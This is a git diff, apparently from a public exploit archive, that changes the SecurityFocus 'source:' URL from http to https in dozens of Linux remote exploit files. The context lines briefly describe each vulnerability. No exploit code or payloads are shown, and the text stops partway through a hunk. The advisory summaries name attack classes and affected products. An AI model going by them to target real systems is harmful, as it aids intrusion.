http://www.securityfocus.com/bid/13642/info +source: https://www.securityfocus.com/bid/13642/info pServ is prone to a directory traversal vulnerability. This occurs because the application does not implement a proper method for filtering directory traversal sequences from URIs. Since this can be done from the cgi-bin directory, it is possible to execute commands to which the Web server has permission. diff --git a/exploits/linux/remote/25706.cpp b/exploits/linux/remote/25706.cpp index 14ee3929f..9f1a54bfc 100644 --- a/exploits/linux/remote/25706.cpp +++ b/exploits/linux/remote/25706.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13766/info +source: https://www.securityfocus.com/bid/13766/info GNU Mailutils mail is affected by an email header buffer overflow vulnerability. diff --git a/exploits/linux/remote/25802.txt b/exploits/linux/remote/25802.txt index f2aca637a..5719ae525 100644 --- a/exploits/linux/remote/25802.txt +++ b/exploits/linux/remote/25802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13883/info +source: https://www.securityfocus.com/bid/13883/info tattle is affected by a remote command execution vulnerability. diff --git a/exploits/linux/remote/25820.txt b/exploits/linux/remote/25820.txt index 0a5af2dd6..a50068d01 100644 --- a/exploits/linux/remote/25820.txt +++ b/exploits/linux/remote/25820.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13959/info +source: https://www.securityfocus.com/bid/13959/info SurfinGate may allow an attacker to circumvent file filters. diff --git a/exploits/linux/remote/26024.txt b/exploits/linux/remote/26024.txt index adc1b3a89..3ae45c71e 100644 --- a/exploits/linux/remote/26024.txt +++ b/exploits/linux/remote/26024.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14369/info +source: https://www.securityfocus.com/bid/14369/info Internet Graphics Server is affected by a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/26101.txt b/exploits/linux/remote/26101.txt index b7d32e00a..9be5dc28c 100644 --- a/exploits/linux/remote/26101.txt +++ b/exploits/linux/remote/26101.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14487/info +source: https://www.securityfocus.com/bid/14487/info EMC Navisphere Manager is affected by directory traversal and information disclosure vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/26198.txt b/exploits/linux/remote/26198.txt index 1337b6863..fc1e632cd 100644 --- a/exploits/linux/remote/26198.txt +++ b/exploits/linux/remote/26198.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14665/info +source: https://www.securityfocus.com/bid/14665/info Astaro Security Linux is prone to a weakness that may allow remote attackers to connect to arbitrary ports on a vulnerable computer. diff --git a/exploits/linux/remote/26288.txt b/exploits/linux/remote/26288.txt index 9e0920613..731012a2f 100644 --- a/exploits/linux/remote/26288.txt +++ b/exploits/linux/remote/26288.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14888/info +source: https://www.securityfocus.com/bid/14888/info Mozilla Browser/Firefox are affected by an arbitrary command-execution vulnerability. diff --git a/exploits/linux/remote/26536.txt b/exploits/linux/remote/26536.txt index a0b1e4459..11c53e0d4 100644 --- a/exploits/linux/remote/26536.txt +++ b/exploits/linux/remote/26536.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15488/info +source: https://www.securityfocus.com/bid/15488/info Qualcomm Worldmail server is prone to a directory traversal vulnerability. diff --git a/exploits/linux/remote/26540.txt b/exploits/linux/remote/26540.txt index 750484d6a..11175a5f7 100644 --- a/exploits/linux/remote/26540.txt +++ b/exploits/linux/remote/26540.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15507/info +source: https://www.securityfocus.com/bid/15507/info Inkscape is prone to a buffer overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before copying it into a finite sized buffer. diff --git a/exploits/linux/remote/26741.pl b/exploits/linux/remote/26741.pl index bdfc104cb..1009135aa 100755 --- a/exploits/linux/remote/26741.pl +++ b/exploits/linux/remote/26741.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15730/info +source: https://www.securityfocus.com/bid/15730/info Horde IMP is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/linux/remote/26913.c b/exploits/linux/remote/26913.c index 8768a16ed..557a15d46 100644 --- a/exploits/linux/remote/26913.c +++ b/exploits/linux/remote/26913.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15968/info +// source: https://www.securityfocus.com/bid/15968/info Info-ZIP 'unzip' is susceptible to a filename buffer-overflow vulnerability. The application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. diff --git a/exploits/linux/remote/27032.txt b/exploits/linux/remote/27032.txt index 704681139..b3293814b 100644 --- a/exploits/linux/remote/27032.txt +++ b/exploits/linux/remote/27032.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16151/info +source: https://www.securityfocus.com/bid/16151/info HylaFAX is vulnerable to multiple arbitrary command-execution vulnerabilities. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/27150.txt b/exploits/linux/remote/27150.txt index 1000655ca..47e63dfef 100644 --- a/exploits/linux/remote/27150.txt +++ b/exploits/linux/remote/27150.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16427/info +source: https://www.securityfocus.com/bid/16427/info Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain. diff --git a/exploits/linux/remote/27233.txt b/exploits/linux/remote/27233.txt index 5c4843350..55e92bb5b 100644 --- a/exploits/linux/remote/27233.txt +++ b/exploits/linux/remote/27233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16668/info +source: https://www.securityfocus.com/bid/16668/info SAP Business Connector is prone to a file-access/deletion vulnerability. This issue arises due to an access-validation error. diff --git a/exploits/linux/remote/27234.txt b/exploits/linux/remote/27234.txt index d8670855b..458133bc6 100644 --- a/exploits/linux/remote/27234.txt +++ b/exploits/linux/remote/27234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16668/info +source: https://www.securityfocus.com/bid/16668/info SAP Business Connector is prone to a file-access/deletion vulnerability. This issue arises due to an access-validation error. diff --git a/exploits/linux/remote/27235.txt b/exploits/linux/remote/27235.txt index cc2fc0be3..2d7687a38 100644 --- a/exploits/linux/remote/27235.txt +++ b/exploits/linux/remote/27235.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16671/info +source: https://www.securityfocus.com/bid/16671/info SAP Business Connector is susceptible to an input-validation vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/27244.txt b/exploits/linux/remote/27244.txt index 08046a7d9..542ad7c5c 100644 --- a/exploits/linux/remote/27244.txt +++ b/exploits/linux/remote/27244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16696/info +source: https://www.securityfocus.com/bid/16696/info Wimpy MP3 is prone to a weakness that permits the overwriting of a text file with arbitrary attacker-supplied data. diff --git a/exploits/linux/remote/27326.txt b/exploits/linux/remote/27326.txt index 13b5f2541..101078d4e 100644 --- a/exploits/linux/remote/27326.txt +++ b/exploits/linux/remote/27326.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16850/info +source: https://www.securityfocus.com/bid/16850/info MySQL is prone to a query-logging-bypass vulnerability. This issue is due to a discrepancy between the handling of NULL bytes in the 'mysql_real_query()' function and in the query-logging functionality. diff --git a/exploits/linux/remote/27630.txt b/exploits/linux/remote/27630.txt index 7c5f68d19..ea5b10071 100644 --- a/exploits/linux/remote/27630.txt +++ b/exploits/linux/remote/27630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17484/info +source: https://www.securityfocus.com/bid/17484/info Plone is susceptible to a remote access-control bypass vulnerability. This issue is due to the application's failure to properly enforce privileges to various MembershipTool methods. diff --git a/exploits/linux/remote/27801.txt b/exploits/linux/remote/27801.txt index 483ffaba3..b50ad146a 100644 --- a/exploits/linux/remote/27801.txt +++ b/exploits/linux/remote/27801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17808/info +source: https://www.securityfocus.com/bid/17808/info Quagga is susceptible to remote information-disclosure and route-injection vulnerabilities. The application fails to properly ensure that required authentication and protocol configuration options are enforced. diff --git a/exploits/linux/remote/27802.txt b/exploits/linux/remote/27802.txt index 4681c7716..620f964dc 100644 --- a/exploits/linux/remote/27802.txt +++ b/exploits/linux/remote/27802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17808/info +source: https://www.securityfocus.com/bid/17808/info Quagga is susceptible to remote information-disclosure and route-injection vulnerabilities. The application fails to properly ensure that required authentication and protocol configuration options are enforced. diff --git a/exploits/linux/remote/27902.txt b/exploits/linux/remote/27902.txt index 25625c8cf..06cdee553 100644 --- a/exploits/linux/remote/27902.txt +++ b/exploits/linux/remote/27902.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18068/info +source: https://www.securityfocus.com/bid/18068/info Prodder is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/27987.html b/exploits/linux/remote/27987.html index bf949ef4a..5e5ad2fef 100644 --- a/exploits/linux/remote/27987.html +++ b/exploits/linux/remote/27987.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18308/info +source: https://www.securityfocus.com/bid/18308/info Multiple web browsers are prone to a JavaScript key-filtering vulnerability because the browsers fail to securely handle keystroke input from users. diff --git a/exploits/linux/remote/28181.c b/exploits/linux/remote/28181.c index 16148c6d7..128c8d023 100644 --- a/exploits/linux/remote/28181.c +++ b/exploits/linux/remote/28181.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18859/info +// source: https://www.securityfocus.com/bid/18859/info The AdPlug library is affected by multiple remote buffer-overflow vulnerabilities. These issues are due to the library's failure to properly bounds-check user-supplied input before copying it into insufficiently sized memory buffers. diff --git a/exploits/linux/remote/28314.c b/exploits/linux/remote/28314.c index 630672eeb..d710455f2 100644 --- a/exploits/linux/remote/28314.c +++ b/exploits/linux/remote/28314.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19255/info +// source: https://www.securityfocus.com/bid/19255/info Bomberclone is prone to remote information-disclosure and denial-of-service vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/28397.sh b/exploits/linux/remote/28397.sh index 56735502c..b3e4a5948 100755 --- a/exploits/linux/remote/28397.sh +++ b/exploits/linux/remote/28397.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19555/info +source: https://www.securityfocus.com/bid/19555/info GNU binutils GAS (GNU assembler) is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/remote/28398.txt b/exploits/linux/remote/28398.txt index 4e16c504c..3261b277c 100644 --- a/exploits/linux/remote/28398.txt +++ b/exploits/linux/remote/28398.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19559/info +source: https://www.securityfocus.com/bid/19559/info MySQL is prone to these vulnerabilities: diff --git a/exploits/linux/remote/28424.txt b/exploits/linux/remote/28424.txt index ca34bcd94..fd3ccbae3 100644 --- a/exploits/linux/remote/28424.txt +++ b/exploits/linux/remote/28424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19661/info +source: https://www.securityfocus.com/bid/19661/info Apache HTTP server is prone to a security weakness related to HTTP request headers. diff --git a/exploits/linux/remote/28595.txt b/exploits/linux/remote/28595.txt index b34297b17..2389eaaf3 100644 --- a/exploits/linux/remote/28595.txt +++ b/exploits/linux/remote/28595.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20067/info +source: https://www.securityfocus.com/bid/20067/info The httpd daemon of BusyBox is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/28639.rb b/exploits/linux/remote/28639.rb index 6c759dcaf..033f033e7 100755 --- a/exploits/linux/remote/28639.rb +++ b/exploits/linux/remote/28639.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20138/info +source: https://www.securityfocus.com/bid/20138/info Apple QuickTime plug-in is prone to an arbitrary-script-execution weakness when executing QuickTime Media Link files (.qtl). diff --git a/exploits/linux/remote/29033.html b/exploits/linux/remote/29033.html index 6545278b6..61252fcfc 100644 --- a/exploits/linux/remote/29033.html +++ b/exploits/linux/remote/29033.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21082/info +source: https://www.securityfocus.com/bid/21082/info Links and ELinks are prone to a remote command-execution vulnerability because the applications fail to properly process website data containing 'smb' commands. diff --git a/exploits/linux/remote/29160.c b/exploits/linux/remote/29160.c index 7abc614e2..fd14d5a66 100644 --- a/exploits/linux/remote/29160.c +++ b/exploits/linux/remote/29160.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/21235/info +source: https://www.securityfocus.com/bid/21235/info GNU Tar is prone to a vulnerability that may allow an attacker to place files and overwrite files in arbitrary locations on a vulnerable computer. These issues present themselves when the application processes malicious archives. diff --git a/exploits/linux/remote/29302.txt b/exploits/linux/remote/29302.txt index e01bd53ff..675909d9c 100644 --- a/exploits/linux/remote/29302.txt +++ b/exploits/linux/remote/29302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21687/info +source: https://www.securityfocus.com/bid/21687/info XSP is prone to a source code information-disclosure vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/29383.txt b/exploits/linux/remote/29383.txt index df17cccd5..8ad2297bd 100644 --- a/exploits/linux/remote/29383.txt +++ b/exploits/linux/remote/29383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21858/info +source: https://www.securityfocus.com/bid/21858/info Adobe Reader Plugin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/29471.txt b/exploits/linux/remote/29471.txt index 9f0686c74..1ea4cbd65 100644 --- a/exploits/linux/remote/29471.txt +++ b/exploits/linux/remote/29471.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22076/info +source: https://www.securityfocus.com/bid/22076/info BlueZ hidd is prone to a device-command-injection vulnerability. diff --git a/exploits/linux/remote/29496.txt b/exploits/linux/remote/29496.txt index a91c0775f..0d4c0c9e6 100644 --- a/exploits/linux/remote/29496.txt +++ b/exploits/linux/remote/29496.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22121/info +source: https://www.securityfocus.com/bid/22121/info ArsDigita Community System is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/29527.pl b/exploits/linux/remote/29527.pl index 378aceaae..c837786eb 100755 --- a/exploits/linux/remote/29527.pl +++ b/exploits/linux/remote/29527.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22252/info +source: https://www.securityfocus.com/bid/22252/info The 'xine' program is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function. diff --git a/exploits/linux/remote/29595.txt b/exploits/linux/remote/29595.txt index 35d9d0967..23ac1aaec 100644 --- a/exploits/linux/remote/29595.txt +++ b/exploits/linux/remote/29595.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22520/info +source: https://www.securityfocus.com/bid/22520/info php rrd browser is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/29689.py b/exploits/linux/remote/29689.py index c277de1e7..071d65225 100755 --- a/exploits/linux/remote/29689.py +++ b/exploits/linux/remote/29689.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22757/info +source: https://www.securityfocus.com/bid/22757/info GnuPG is prone to a weakness that may allow an attacker to add arbitrary content into a message without the end user knowing. diff --git a/exploits/linux/remote/29690.py b/exploits/linux/remote/29690.py index 2c8711652..ec6f66d46 100755 --- a/exploits/linux/remote/29690.py +++ b/exploits/linux/remote/29690.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22759/info +source: https://www.securityfocus.com/bid/22759/info KMail is prone to a vulnerability that may allow an attacker to add arbitrary content into a message without the end user knowing. diff --git a/exploits/linux/remote/29691.py b/exploits/linux/remote/29691.py index b2ceb79d3..8bb15a173 100755 --- a/exploits/linux/remote/29691.py +++ b/exploits/linux/remote/29691.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22760/info +source: https://www.securityfocus.com/bid/22760/info Evolution is prone to a vulnerability that may allow an attacker to add arbitrary content into a message without the end user knowing. diff --git a/exploits/linux/remote/29739.txt b/exploits/linux/remote/29739.txt index f46ca439f..c3557a06c 100644 --- a/exploits/linux/remote/29739.txt +++ b/exploits/linux/remote/29739.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22960/info +source: https://www.securityfocus.com/bid/22960/info Apache HTTP servers running with the Tomcat servlet container are prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/linux/remote/29753.c b/exploits/linux/remote/29753.c index 13ee7cc91..4fc370834 100644 --- a/exploits/linux/remote/29753.c +++ b/exploits/linux/remote/29753.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23021/info +// source: https://www.securityfocus.com/bid/23021/info The file(1) command is prone to an integer-underflow vulnerability because the command fails to adequately handle user-supplied data. diff --git a/exploits/linux/remote/29768.txt b/exploits/linux/remote/29768.txt index a14707790..05bcb3c6c 100644 --- a/exploits/linux/remote/29768.txt +++ b/exploits/linux/remote/29768.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23082/info +source: https://www.securityfocus.com/bid/23082/info Mozilla Firefox is prone to vulnerability that may allow attackers to obtain potentially sensitive information. diff --git a/exploits/linux/remote/29769.txt b/exploits/linux/remote/29769.txt index 56307509b..5184a854f 100644 --- a/exploits/linux/remote/29769.txt +++ b/exploits/linux/remote/29769.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23089/info +source: https://www.securityfocus.com/bid/23089/info Opera is prone to vulnerability that may allow attackers to obtain potentially sensitive information. diff --git a/exploits/linux/remote/29770.txt b/exploits/linux/remote/29770.txt index 5fc7386d1..613d34d55 100644 --- a/exploits/linux/remote/29770.txt +++ b/exploits/linux/remote/29770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23091/info +source: https://www.securityfocus.com/bid/23091/info KDE Konqueror is prone to a vulnerability that may allow attackers to obtain potentially sensitive information. diff --git a/exploits/linux/remote/29932.txt b/exploits/linux/remote/29932.txt index 2c7802997..34c1594cc 100644 --- a/exploits/linux/remote/29932.txt +++ b/exploits/linux/remote/29932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23709/info +source: https://www.securityfocus.com/bid/23709/info Red Hat Directory Server is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/30018.py b/exploits/linux/remote/30018.py index cd676ef0d..945b5fb6b 100755 --- a/exploits/linux/remote/30018.py +++ b/exploits/linux/remote/30018.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23887/info +source: https://www.securityfocus.com/bid/23887/info Python applications that use the 'PyLocale_strxfrm' function are prone to an information leak. diff --git a/exploits/linux/remote/30043.txt b/exploits/linux/remote/30043.txt index 30aa201cb..39756035a 100644 --- a/exploits/linux/remote/30043.txt +++ b/exploits/linux/remote/30043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24004/info +source: https://www.securityfocus.com/bid/24004/info Sun JDK is prone to a multiple vulnerabilities. diff --git a/exploits/linux/remote/30074.txt b/exploits/linux/remote/30074.txt index b1b89d7e7..b1a6950dc 100644 --- a/exploits/linux/remote/30074.txt +++ b/exploits/linux/remote/30074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24111/info +source: https://www.securityfocus.com/bid/24111/info PEAR is prone to a vulnerability that lets attackers overwrite arbitrary files. diff --git a/exploits/linux/remote/30089.txt b/exploits/linux/remote/30089.txt index f4a9f3aac..102c7ac23 100644 --- a/exploits/linux/remote/30089.txt +++ b/exploits/linux/remote/30089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24161/info +source: https://www.securityfocus.com/bid/24161/info Ruby on Rails is prone to a script-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/linux/remote/30142.txt b/exploits/linux/remote/30142.txt index 5fff48087..369600b6e 100644 --- a/exploits/linux/remote/30142.txt +++ b/exploits/linux/remote/30142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24291/info +source: https://www.securityfocus.com/bid/24291/info GDB is prone to a buffer-overflow vulnerability because it fails to properly check bounds when handling specially crafted executable files. diff --git a/exploits/linux/remote/30186.txt b/exploits/linux/remote/30186.txt index 67980c0f4..f7954ddd3 100644 --- a/exploits/linux/remote/30186.txt +++ b/exploits/linux/remote/30186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24436/info +source: https://www.securityfocus.com/bid/24436/info Firebird SQL is prone to a remote buffer-overflow vulnerability. diff --git a/exploits/linux/remote/30284.vbs b/exploits/linux/remote/30284.vbs index 71a3f60ac..35c32ec87 100644 --- a/exploits/linux/remote/30284.vbs +++ b/exploits/linux/remote/30284.vbs @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24832/info +source: https://www.securityfocus.com/bid/24832/info Sun Java Runtime Environment is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/remote/30285.txt b/exploits/linux/remote/30285.txt index bada251fb..e4b4d12f5 100644 --- a/exploits/linux/remote/30285.txt +++ b/exploits/linux/remote/30285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24837/info +source: https://www.securityfocus.com/bid/24837/info Microsoft Internet Explorer, Mozilla Firefox and Netscape Navigator are prone to a vulnerability that lets attackers inject commands through the 'firefoxurl' and 'navigatorurl' protocol handlers. diff --git a/exploits/linux/remote/30291.txt b/exploits/linux/remote/30291.txt index 6a39da65c..58b892e26 100644 --- a/exploits/linux/remote/30291.txt +++ b/exploits/linux/remote/30291.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24866/info +source: https://www.securityfocus.com/bid/24866/info Multiple applications using RAR are prone to a NULL-pointer dereference vulnerability. diff --git a/exploits/linux/remote/30319.c b/exploits/linux/remote/30319.c index ebe2616bb..e0ffd27e4 100644 --- a/exploits/linux/remote/30319.c +++ b/exploits/linux/remote/30319.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24965/info +// source: https://www.securityfocus.com/bid/24965/info The 'tcpdump' utility is prone to an integer-underflow vulnerability because it fails to bounds-check user-supplied input before copying it into an insufficiently sized memory buffer. diff --git a/exploits/linux/remote/30439.txt b/exploits/linux/remote/30439.txt index 2d363ed24..04d660ac5 100644 --- a/exploits/linux/remote/30439.txt +++ b/exploits/linux/remote/30439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25142/info +source: https://www.securityfocus.com/bid/25142/info Mozilla Firefox, Thunderbird, and SeaMonkey are prone to a vulnerability that allows JavaScript to execute with unintended privileges. diff --git a/exploits/linux/remote/30454.txt b/exploits/linux/remote/30454.txt index 155a1f867..d8ef2e76e 100644 --- a/exploits/linux/remote/30454.txt +++ b/exploits/linux/remote/30454.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25214/info +source: https://www.securityfocus.com/bid/25214/info BlueCat Networks Adonis devices are prone to a remote privilege-escalation vulnerability. This issue occurs when Proteus appliances are used to upload files to an affected Adonis appliance for TFTP download. diff --git a/exploits/linux/remote/30535.pl b/exploits/linux/remote/30535.pl index 37591306b..08221b08f 100755 --- a/exploits/linux/remote/30535.pl +++ b/exploits/linux/remote/30535.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/25459/info +#source: https://www.securityfocus.com/bid/25459/info # #BIND 8 is prone to a remote cache-poisoning vulnerability because of weaknesses in its random-number generator. # diff --git a/exploits/linux/remote/30536.pl b/exploits/linux/remote/30536.pl index 382c5ead6..6f030781d 100755 --- a/exploits/linux/remote/30536.pl +++ b/exploits/linux/remote/30536.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25459/info +source: https://www.securityfocus.com/bid/25459/info BIND 8 is prone to a remote cache-poisoning vulnerability because of weaknesses in its random-number generator. diff --git a/exploits/linux/remote/30543.txt b/exploits/linux/remote/30543.txt index 755a2b62a..8695171f9 100644 --- a/exploits/linux/remote/30543.txt +++ b/exploits/linux/remote/30543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25483/info +source: https://www.securityfocus.com/bid/25483/info Doomsday Engine is prone to multiple remote vulnerabilities, including multiple buffer-overflow issues, a denial-of-service issue, a format-string issue, and an integer-overflow issue. diff --git a/exploits/linux/remote/30677.pl b/exploits/linux/remote/30677.pl index e1b060187..1921d58bb 100755 --- a/exploits/linux/remote/30677.pl +++ b/exploits/linux/remote/30677.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/26095/info +#source: https://www.securityfocus.com/bid/26095/info # #Asterisk 'asterisk-addons' package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. # diff --git a/exploits/linux/remote/30711.txt b/exploits/linux/remote/30711.txt index 8537e479e..a4f41ac6a 100644 --- a/exploits/linux/remote/30711.txt +++ b/exploits/linux/remote/30711.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26212/info +source: https://www.securityfocus.com/bid/26212/info Shttp is prone to a remote directory-traversal vulnerability. diff --git a/exploits/linux/remote/30736.txt b/exploits/linux/remote/30736.txt index 4d837ad37..a4379945c 100644 --- a/exploits/linux/remote/30736.txt +++ b/exploits/linux/remote/30736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26327/info +source: https://www.securityfocus.com/bid/26327/info Emacs is prone to a vulnerability that lets attackers execute arbitrary code. diff --git a/exploits/linux/remote/30907.txt b/exploits/linux/remote/30907.txt index 3e7cd9b76..a027ea966 100644 --- a/exploits/linux/remote/30907.txt +++ b/exploits/linux/remote/30907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26960/info +source: https://www.securityfocus.com/bid/26960/info The Adobe Flash Player ActiveX control is prone to a cross-domain scripting vulnerability. diff --git a/exploits/linux/remote/30971.txt b/exploits/linux/remote/30971.txt index f26129401..f5c2619be 100644 --- a/exploits/linux/remote/30971.txt +++ b/exploits/linux/remote/30971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27103/info +source: https://www.securityfocus.com/bid/27103/info Georgia SoftWorks Secure Shell Server is prone to multiple remote code-execution vulnerabilities: diff --git a/exploits/linux/remote/30998.py b/exploits/linux/remote/30998.py index af0debb26..e0a078cc8 100755 --- a/exploits/linux/remote/30998.py +++ b/exploits/linux/remote/30998.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27178/info +source: https://www.securityfocus.com/bid/27178/info SynCE is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data. diff --git a/exploits/linux/remote/31051.txt b/exploits/linux/remote/31051.txt index 48bde03a3..e72e4acdb 100644 --- a/exploits/linux/remote/31051.txt +++ b/exploits/linux/remote/31051.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27406/info +source: https://www.securityfocus.com/bid/27406/info Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local JavaScript, images and stylesheets files. diff --git a/exploits/linux/remote/31052.java b/exploits/linux/remote/31052.java index 5453b99fa..a7b021765 100644 --- a/exploits/linux/remote/31052.java +++ b/exploits/linux/remote/31052.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27409/info +source: https://www.securityfocus.com/bid/27409/info Apache 'mod_negotiation' is prone to an HTML-injection and an HTTP response-splitting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/linux/remote/31076.py b/exploits/linux/remote/31076.py index f7ae5f1ff..e580789fb 100755 --- a/exploits/linux/remote/31076.py +++ b/exploits/linux/remote/31076.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27499/info +source: https://www.securityfocus.com/bid/27499/info MPlayer is prone to a remote code-execution vulnerability because it fails to sanitize certain 'MOV' file tags before using them to index heap memory. diff --git a/exploits/linux/remote/31127.txt b/exploits/linux/remote/31127.txt index 9a2089091..12b26ccd5 100644 --- a/exploits/linux/remote/31127.txt +++ b/exploits/linux/remote/31127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27700/info +source: https://www.securityfocus.com/bid/27700/info Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local resources. diff --git a/exploits/linux/remote/31309.c b/exploits/linux/remote/31309.c index 729f3a038..dfa61fa4c 100644 --- a/exploits/linux/remote/31309.c +++ b/exploits/linux/remote/31309.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28017/info +// source: https://www.securityfocus.com/bid/28017/info Ghostscript is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/remote/31396.txt b/exploits/linux/remote/31396.txt index 9c50e72ed..77ff756d2 100644 --- a/exploits/linux/remote/31396.txt +++ b/exploits/linux/remote/31396.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28226/info +source: 